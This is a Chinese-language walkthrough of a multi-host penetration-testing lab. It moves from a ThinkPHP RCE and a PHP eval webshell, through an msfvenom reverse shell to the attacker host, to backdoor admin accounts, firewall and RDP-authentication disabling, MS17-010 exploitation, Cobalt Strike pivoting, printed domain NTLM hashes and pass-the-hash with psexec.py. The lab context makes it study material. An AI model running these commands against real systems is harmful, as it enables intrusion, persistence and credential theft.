环境信息

kali:172.16.233.2

内网主机扫描

sudo nmap -sS 192.168.10.0/24

扫描内网主机,存在两台服务器分别是192.168.10.10和192.168.10.233

192.168.10.10

发现是易优CMS

扫下目录,但是没什么特别的发现

gobuster dir -u http://192.168.10.10/  -w /usr/share/wordlists/dirb/small.txt -t 10 -x php,txt,html,bak,aspx,jsp --random-agent

使用fscan进行扫描,发现目标是windows 2012的服务器,并且存在thinkphp的rce漏洞

用工具检测果然存在

rce获取flag

直接执行命令获得flag

写webshell

通过cmd命令将webshell

echo ^<?php @eval($_POST['cmd']);?^> > configws.php

成功写入webshell.php

用蚁剑进行连接

收集内网信息

查看IP信息,发现还有一个内网网段192.168.20.0/24的网段

查看arp表,发现有一个192.168.20.30的主机

上线msf

先生成一个msf反向木马

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.233.2 LPORT=6000 -f exe -o win2012.exe

然后将木马通过蚁剑上传

msf配置监听

然后运行在蚁剑终端运行木马

得到会话

迁移进程

然后迁移进程

run post/windows/manage/migrate

添加路由

添加用户

添加用户并添加到管理员组

net user dfz 123@abc /add
net localgroup Administrators dfz /add

打开远程桌面

尝试使用msf来开启,虽然提示错误,但是其实是成功的

也可以手动用终端开写注册表来开启远程桌面

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

连接的时候出现错误

关闭防火墙

关闭主机防火墙

netsh advfirewall set allprofiles state off

修复“函数不支持”错误

直接禁用身份认证

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f    

成功连接远程桌面

fscan扫描内网

fscan.exe通过msf上传

发下存在主机

192.168.20.20、192.168.20.30

192.168.20.30

使用fscan对192.168.20.30进行扫描

发现存在MS17-010

MS17-010

搜索下ms17_010

msf先尝试使用下面EXP

exploit/windows/smb/ms17_010_eternalblue

再试试看

exploit/windows/smb/ms17_010_psexec

再试试看

auxiliary/admin/smb/ms17_010_command

发现是可以执行命令的

msf开启socket服务

这里我们打开msf的socket服务,这样我们通过代理可以直接访问192.168.20.30

开启远程桌面

还是刚刚一样的操作借助msf17-010命令执行,进行添加用户、添加管理组、关闭防火墙、打开远程登陆

set COMMAND 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
set COMMAND 'net user dfz 123@abc /add'
set COMMAND 'net localgroup Administrators dfz /add'
set COMMAND 'netsh firewall set opmode disable'

将上面的命令都执行后,在192.168.10.10上直接登录192.168.20.30的远程桌面

这里提交的flag3

收集内网信息

通过apr -a发现还有一台192.168.20.20,这里盲猜应该是之前192.168.10.233

192.168.20.20

看了网上的wp说是要用PTH攻击,这里通过cs上线192.168.10.10和192.168.20.30,方便后续操作

CS上线192.168.10.10

先创建监听器

生成payload

通过蚁剑上传并执行

得到会话

CS上线192.168.20.30

右击刚刚上线的192.168.20.10,【Pivoting】-> 【Listener】,将该主机作为跳板

这里我将监听器的名字命名为win2008

生成payload的时候选择刚创建的监听器

生成exe木马,通过蚁剑上传

直接远程桌面,复制到192.168.20.30

刚开始我是手动点击运行的,显示的是dfz用户,读取内存凭证hash权限是不够的

这里用刚刚的msf17_010运行得到system权限的会话

PTH攻击

将域控中的Hashes 进行导出

得到Administrator的Hash

Administrator:500:aad3b435b51404eeaad3b435b51404ee:94bd5248e87cb7f2f9b871d40c903927:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5bc02b7670084dd30471730cc0a1672c:::
cyberweb:1105:aad3b435b51404eeaad3b435b51404ee:2de5cd0f15d1c070851d1044e1d95c90:::
dfz:1106:aad3b435b51404eeaad3b435b51404ee:73f5d97549f033374fa6d9f9ce247ffd:::
WIN-7NRTJO59O7N$:1000:aad3b435b51404eeaad3b435b51404ee:c42def0666685723f5ad633ecef0194c:::
CYBERWEB$:1103:aad3b435b51404eeaad3b435b51404ee:5da402e15f15fe70011a10a4ebea280c:::

使用msf开启socks代理

通过proxychains4来使用msf的socks5代理,使用psexec.py(Kali自带)使用域管理员的hash来获得192.168.20.20的会话

proxychains4 -q python3 psexec.py -hashes :94bd5248e87cb7f2f9b871d40c903927 cyberstrikelab.com/administrator@192.168.20.20

get flag

Logo

欢迎加入DeepSeek 技术社区。在这里,你可以找到志同道合的朋友,共同探索AI技术的奥秘。

更多推荐